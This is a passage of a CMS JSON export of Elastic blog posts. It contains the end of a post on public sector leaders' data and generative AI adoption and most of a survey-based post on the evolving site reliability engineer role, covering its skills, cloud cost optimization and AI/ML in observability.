style='font-size: 12pt;'\u003eLevel 2: Analyze and action\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLevel 3: Explore and automate\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLevel 4: Collaborate and transform\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhile 76% of leaders in the public sector believe that their organization is more advanced in data analytics and intelligence than their peers’, their answers to the data maturity assessment revealed otherwise. They often had a lot of room for improved data management, analysis, and data-driven decision-making and efficiency.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs0d5fad277812a425"}}},{"quotes":{"quote_l10n":"Data is very siloed right now. Different systems exist, and they don't communicate with one another. Each team is wary of giving up what they're familiar with or pushing for change. We need an aggregator that streamlines everything.","_metadata":{"uid":"cs310f96fee50c1f5c"},"quote_author_l10n":"Technology decision-maker, public sector","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"Can AI and generative AI come to the rescue?","_metadata":{"uid":"cs823527f75ec27b51"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI and generative AI are already proving to be a powerful tool in driving better operational outcomes. Nearly all the survey respondents were excited and optimistic about the possibilities of using data and AI to increase productivity, citing the following as just a few of the potential benefits:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImproved productivity (through a unified data view)\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBetter operational resilience\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eEnhanced customer experiences\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eReduced disruption and risk\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLower costs\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs42cc2acbfb534f6f"}}},{"quotes":{"quote_l10n":"To stay current in the public sector, we’re using AI. All competition is already using it or will be soon — you can't be left behind.","_metadata":{"uid":"cs9998ea0098f28071"},"quote_author_l10n":"Technology decision-maker, public sector","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"Many organizations are making the leap into generative AI — are you? ","_metadata":{"uid":"cs10f164efb226d0e9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis next-generation technology is changing how we cultivate ideas, solutions, and insights — unlocking unprecedented opportunities for innovation, productivity, and efficiency. Though the public sector is more cautious around AI adoption primarily due to government regulations and data privacy, nearly all the participants identified these top use cases where they’ll lean into AI:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAutomation of manual processes and workflows based on line of business requirements, such as customer support, research and development, and procurement\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eData ingestion and augmentation\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAI assistants that can help with information retrieval and summarization for day-to-day tasks\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eData summarization and analysis\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"What’s next?","_metadata":{"uid":"cs47a8b5f97d40361d"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe referenced just a small sampling of survey data points and findings. But you can dig into 40+ pages of findings on how public sector organizations are making better use of their data and using (or planning to use) AI to drive efficiency and productivity, enhancing team and customer experiences.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003c/span\u003e\u003ca href=\"http://elastic.co/industries/public-sector/5-generative-ai-insights-for-leaders\"\u003e\u003cspan style='font-size: 12pt;'\u003eGet the full report\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs92ca744cd8bc0a84"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs7d7d0fc4fe947507"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cse4757459c27b20c3"}}}],"publish_date":"2025-01-07","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt62646ad19dd7b0b8","ACL":{},"created_at":"2020-06-17T03:23:52.847Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"government","label_l10n":"Government","tags":[],"title":"Government","updated_at":"2020-07-06T22:17:42.931Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.550Z","user":"blt4b2e1169881270a8"}},{"_version":6,"locale":"en-us","uid":"blt250fefd1c4d36a4c","ACL":{},"created_at":"2020-06-17T03:22:54.278Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"education-nonprofit","label_l10n":"Education \u0026 non profit","tags":[],"title":"Education \u0026 non-profit","updated_at":"2020-08-13T16:41:17.070Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.286Z","user":"blt4b2e1169881270a8"}},{"_version":1,"locale":"en-us","uid":"blt3185b1f0e9eed8d1","ACL":{},"created_at":"2021-09-20T22:40:25.614Z","created_by":"blt36e890d06c5ec32c","hidden_value":false,"keyword":"public-sector","label_l10n":"Public Sector","tags":[],"title":"Public Sector","updated_at":"2021-09-20T22:40:25.614Z","updated_by":"blt36e890d06c5ec32c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.530Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","uid":"bltc6e3d049760fc06a","title":"Government","label_l10n":"Government","keyword":"government","hidden_value":false,"tags":[],"locale":"en-us","created_by":"blt3044324473ef223b70bc674c","updated_by":"blt3044324473ef223b70bc674c","created_at":"2023-11-06T20:40:32.959Z","updated_at":"2023-11-06T20:40:32.959Z","ACL":{},"_version":1,"publish_details":{"time":"2023-11-09T17:49:08.338Z","user":"bltd2a3eb4e4d2bc159","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt9bb0140feaab7f35","_version":1,"is_dir":false,"ACL":{},"content_type":"image/jpeg","created_at":"2024-12-18T15:14:27.837Z","created_by":"bltb6c155cd84fc0c1a","file_size":"161963","filename":"Elastic_Banner_8_(1).jpg","parent_uid":null,"tags":[],"title":"Elastic Banner_8 (1).jpg","updated_at":"2024-12-18T15:14:27.837Z","updated_by":"bltb6c155cd84fc0c1a","publish_details":{"time":"2025-01-07T14:00:00.944Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt9bb0140feaab7f35/6762e6d34657c8bcc0d212ca/Elastic_Banner_8_(1).jpg"},"title":"5 insights from public sector leaders: Solving organizational challenges with data and AI","title_l10n":"5 insights from public sector leaders: Solving organizational challenges with data and AI ","updated_at":"2025-01-06T16:29:54.188Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/public-sector-leaders-insights-ai","publish_details":{"time":"2025-01-07T14:00:00.921Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt579720ad0039428f","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Interested in becoming a site reliability engineer (SRE)? Find out how practitioners feel about this role and what types of skills and responsibilities are needed in today’s world of modern observability. ","author":["bltd516a87082210f90"],"category":["bltc17514bfdbc519df"],"created_at":"2024-12-19T20:16:58.863Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs69cf7751421c64da"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eImagine the CTO walks into your team meeting and drops a bombshell: \"We need to cut our cloud costs by 30% this quarter.\" As the lead SRE, this might cause a strong reaction — isn’t your job about ensuring reliability? When did you become responsible for the company's cloud bill?\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIf you've had a similar experience, you're not alone. The role of site reliability engineers (SREs) is evolving fast. A recent \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/observability/white-paper/state-of-observability-practitioner-perspective\"\u003e\u003cspan style='font-size: 12pt;'\u003esurvey of observability practitioners\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e sheds light on this transformation, revealing both challenges and opportunities for those of us in the SRE trenches.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Most SREs love their jobs ","_metadata":{"uid":"cs92579f0e364c56e8"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA whopping 94% of SREs surveyed said they would recommend the role to a colleague. That's a ringing endorsement if I've ever heard one.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cscc9e3b681bfc3816"}}},{"image":{"image":{"uid":"bltbcf4aa924993e96a","_version":1,"title":"image1.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-19T20:00:42.305Z","updated_at":"2024-12-19T20:00:42.305Z","content_type":"image/png","file_size":"372862","filename":"image1.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-19T20:19:08.573Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltbcf4aa924993e96a/67647b6a08d14f4b64da5253/image1.png"},"_metadata":{"uid":"cs7582a2ff69e6f15d"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csd7fdc193fd4925c2"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBut why do SREs love it so much? The survey offers some clues:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e90% of SREs agree that the job is interesting and offers opportunities to learn about both business and technology.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe role requires a diverse skill set, keeping things challenging and engaging.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSREs often have a bird's-eye view of the entire system, allowing for strategic thinking and impactful improvements.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"SREs learn about business and technology","_metadata":{"uid":"csd96f742bb9a35617"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe foundation of this high job satisfaction appears to stem from the unique blend of challenges and opportunities that define the SRE role. While many technical positions might focus on specific aspects of technology or business operations, SREs get to experience both worlds simultaneously. Most SREs report finding their work intellectually stimulating, specifically citing the dynamic interplay between business and technology as a key driver of their job satisfaction.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"SREs are challenged by their diverse skill set","_metadata":{"uid":"cs5b182143b33506f9"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat makes the SRE role particularly engaging is its demand for a diverse skill set. These professionals might spend one day optimizing cloud infrastructure; the next day collaborating with product teams to improve service level objectives (SLOs); and another day designing automated incident response systems. The emergence of generative AI (GenAI) has also opened up a Pandora's box of new possibilities and techniques for SREs to use. This variety isn't just about keeping things interesting. It also represents continuous opportunities for professional growth and skill development.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"SREs get to have a bird’s-eye view","_metadata":{"uid":"cs88a3ae3315391cbc"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOne of the most distinctive aspects of the SRE role is the unique vantage point it provides within an organization. SREs maintain a comprehensive view of systems — from infrastructure foundations to high-level business objectives. This panoramic perspective enables them to identify patterns and opportunities that might go unnoticed by teams with narrower focus areas. With this broad view, they're uniquely positioned to drive measurable improvements that impact both technical metrics and business outcomes.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"SREs: The Swiss Army knives of tech","_metadata":{"uid":"cs25d1f561d65cc8c9"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe strategic nature of the role places SREs at the forefront of technological innovation. As systems become increasingly complex and distributed, their role in balancing reliability with rapid innovation becomes ever more crucial. Rather than simply maintaining existing systems, these professionals actively shape how modern technology organizations operate and scale.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBeyond technical challenges, there's a deeper satisfaction in the core mission of the role. SREs serve as both architects and guardians of critical systems that power modern businesses. They're the professionals who ensure smooth operations, step in during crises to restore stability, and implement preventive measures before problems occur.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe SRE community is also known for its strong emphasis on knowledge sharing and collaborative growth. This creates a positive environment where professionals consistently learn from each other's experiences and innovations. Such collaborative spirit has helped establish SRE as not just a job but also a community of practice.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThese high satisfaction rates send a compelling message to those considering entering the field. Despite the inherent challenges and complexities of the role, the rewards — both personal and professional — appear to make it worthwhile. And if current satisfaction levels are any indication, it’s potentially even more rewarding.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The expanding SRE toolkit","_metadata":{"uid":"csf10673971071fdc6"},"header_style":"H2","paragraph_l10n":""}],"_metadata":{"uid":"cse1852ee582069772"}}},{"image":{"image":{"uid":"bltaa8a35e8dfb0bb4e","_version":1,"title":"image3.png","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-12-19T20:01:55.301Z","updated_at":"2024-12-19T20:01:55.301Z","content_type":"image/png","file_size":"334110","filename":"image3.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-12-19T20:19:08.474Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/bltaa8a35e8dfb0bb4e/67647bb3776bc019f327a53c/image3.png"},"_metadata":{"uid":"cs73091e1fb09a4d51"},"caption_l10n":"","alt_text_l10n":"","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs3b8690af2bc3ddd4"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSpeaking of diverse skill sets, the survey highlighted some key areas of expertise for modern SREs.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Monitoring and observability (80%)","_metadata":{"uid":"cs47507000f96808bd"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAt the core of the SRE skill set lies monitoring and observability expertise with four out of five professionals citing it as essential to their role. This comes as no surprise. In today's complex distributed systems, the ability to gain meaningful insights from system behavior isn't just useful; it's fundamental. Modern SREs need to navigate through seas of telemetry data, identifying patterns and anomalies that could impact service reliability.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Automation and scripting (75%)","_metadata":{"uid":"csba35c7a45944ec78"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHand in hand with observability comes the art of automation and scripting, endorsed by three-quarters of surveyed SREs. This emphasis on automation reflects a core principle of the role: eliminating repetitive tasks to focus on more strategic work. Whether it's deploying infrastructure as code, automating incident response, or creating self-healing systems, the ability to write efficient automation solutions has become invaluable.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Performance tuning and optimization (68%)","_metadata":{"uid":"csa882567615c6aa0a"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003ePerformance tuning and optimization represents another crucial skill area with more than two-thirds of SREs highlighting its importance. In an era where milliseconds can mean the difference between user satisfaction and frustration, the ability to identify and resolve performance bottlenecks has grown critical. This isn't just about making systems faster; it's also about understanding the delicate balance between performance, reliability, and cost.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Incident response and postmortem analysis (60%)","_metadata":{"uid":"cs951e5057095b546a"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe importance of incident response and postmortem analysis skills — cited by 60% of SREs — reflects the profession's emphasis on learning and continuous improvement. When incidents occur, the ability to respond effectively and then extract meaningful lessons from the experience can mean the difference between recurring issues and systemic improvements. This involves not only technical expertise but also the soft skills needed to facilitate blameless postmortems and drive organizational learning to improve workflows.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Distributed systems design (40%)","_metadata":{"uid":"cs67d65872f7405089"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eAs systems grow more distributed and complex, expertise in distributed system design has become increasingly valuable with two out of five SREs identifying it as a key skill. Understanding how to build and maintain reliable systems across multiple regions, clouds, and technologies has become crucial as organizations expand their digital footprint.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The emergence of cost management skills","_metadata":{"uid":"cs5a6c5f1364005f38"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBut perhaps the most interesting trend emerging from recent surveys is the growing importance of cost management skills. In an era of increasing cloud complexity and rising infrastructure costs, SREs are increasingly being called upon to balance reliability with financial efficiency. This new dimension adds another layer of complexity to the role, requiring SREs to consider the cost implications of their architectural decisions and optimization strategies.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis evolving skill set reflects broader changes in the technology landscape. As organizations continue their digital transformation journeys, the role of the SRE has expanded beyond traditional operational concerns to encompass a wider range of business-critical competencies. The modern SRE needs to be part systems engineer, part business analyst, and part strategic advisor.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor those considering a career in SRE or looking to evolve their existing role, understanding these key skills provides a valuable roadmap for professional development. The diversity of required skills also highlights why the role remains so engaging and challenging — there's always something new to learn and master in the pursuit of system reliability.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The new frontier: Cost optimization","_metadata":{"uid":"csa76037048b3d70dc"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHere's where things get interesting. The survey revealed that 85% of observability practitioners have some responsibility for cost management. For 31%, it's a formal part of their job evaluation.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis trend isn't emerging in isolation. As organizations continue their cloud migration journeys and expand their digital footprints, many are experiencing the sticker shock of rapidly escalating cloud costs. The days of treating cloud resources as an unlimited utility are waning and being replaced by a more nuanced approach that balances technical requirements with financial sustainability.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhat makes this shift particularly fascinating is how naturally it aligns with the core competencies of observability practitioners and SREs. These professionals already possess deep insights into system behavior, resource utilization, and performance patterns. They understand which services are essential, which are over-provisioned, and where optimization opportunities lie. In many ways, they're ideally positioned to lead cost optimization initiatives while maintaining service reliability.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe incorporation of cost management into observability practices is transforming how teams approach system design and optimization. Decisions about data retention, sampling rates, and instrumentation density now carry financial implications that must be carefully weighed. The question is no longer just \"can we collect this data?\" but also \"should we collect this data and at what granularity?\"\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"The approach to observability tooling and infrastructure is changing","_metadata":{"uid":"csbcab88362a11c65f"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis evolution is also changing how organizations approach observability tooling and infrastructure. Teams are looking for solutions that provide both technical insights and cost visibility. The ability to understand the financial impact of observability decisions — from logging volumes to metric collection frequencies — has become crucial for making informed architectural choices.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe formal integration of cost management into job evaluations for 31% of practitioners signals a maturation in how organizations view the relationship between technical operations and business outcomes. It recognizes that effective system reliability isn't just about maintaining uptime and performance — it's about doing so in a cost-effective manner that supports business sustainability.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis shift also presents new opportunities for observability practitioners to demonstrate their value to organizations. By combining their technical expertise with cost optimization skills, these professionals can drive improvements that impact both system reliability and the bottom line. The ability to speak both languages — technical and financial — is becoming an increasingly valuable skill in the modern technology landscape.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLooking ahead, this trend suggests that the future of observability will be more intertwined with financial operations (FinOps) practices. The most successful practitioners will be those who can navigate this intersection effectively, making informed decisions that balance technical needs with financial constraints. As cloud costs continue to gain more attention in boardrooms, the role of observability practitioners in managing these costs will likely only grow in importance.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eFor professionals in the field, this evolution presents both challenges and opportunities. Developing skills in cost optimization and financial analysis may require stepping out of traditional technical comfort zones. However, the ability to drive both technical excellence and financial efficiency positions observability practitioners as key strategic partners in their organizations' success.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Balancing act: Reliability vs. cost vs. innovation","_metadata":{"uid":"cs6cd036c43ee39cee"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSo, how do we balance these competing priorities? Here are some strategies I've found effective:\u003c/span\u003e\u003c/p\u003e\u003col\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eTreat cost as a reliability concern: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eJust as we set SLOs for uptime or latency, consider setting objectives for cost efficiency. This mindset can help align cost management with our core mission of reliability.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUse observability for cost insights:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Use your observability tools to gain visibility into cost drivers. Many platforms, including \u003c/span\u003e\u003ca href=\"https://www.elastic.co/observability\"\u003e\u003cspan style='font-size: 12pt;'\u003eElastic Observability\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, now offer features to correlate performance metrics with cost data.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eAutomate cost optimization:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Apply your automation skills to cost management. Set up alerts for unusual spending spikes, automate resource scaling based on demand, and create self-service tools for developers to understand the cost implications of their design choices.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCollaborate across teams:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Work closely with development teams to build cost-awareness into the development process. This could involve creating cost-based architectural decision trees or including cost considerations in code reviews.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eInvest in FinOps knowledge:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Familiarize yourself with FinOps principles and tools. This emerging practice bridges the gap between finance, technology, and business.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eUse AI/machine learning (ML) for predictive cost management: \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eAs the survey showed, AI/ML is becoming increasingly important in observability. Look for ways to apply these technologies to predict and optimize costs proactively.\u003c/span\u003e\u003c/li\u003e\u003c/ol\u003e"},{"title_l10n":"The role of AI/ML in the evolving SRE landscape","_metadata":{"uid":"cs3ee0cd9c76f59065"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eSpeaking of AI/ML, the survey had some interesting findings in this area:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e72% of teams are already using AI/ML for observability use cases.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe top use case is correlating logs, metrics, and traces for troubleshooting.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWhile only 13% say they're getting high value from AI/ML today, 39% expect high value in the future.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe numbers tell an intriguing story: Nearly three-quarters of teams have already incorporated AI/ML capabilities into their observability practices, marking a significant shift in how modern organizations approach system monitoring and troubleshooting.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eToday's primary challenge for AI in observability is focused on one of the field's most persistent challenges: correlating different types of telemetry data. The ability to automatically connect logs, metrics, and traces for troubleshooting has emerged as the leading use case — addressing a pain point that has long plagued observability practitioners. This application of AI helps cut through the complexity of modern distributed systems, potentially reducing investigation times from hours to minutes.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eHowever, the current state of AI in observability presents an interesting paradox. While adoption is high, only 13% of teams report achieving high value from these technologies today. This gap between adoption and satisfaction suggests we're in a transitional period, where organizations are actively experimenting with AI capabilities but haven't yet fully optimized their 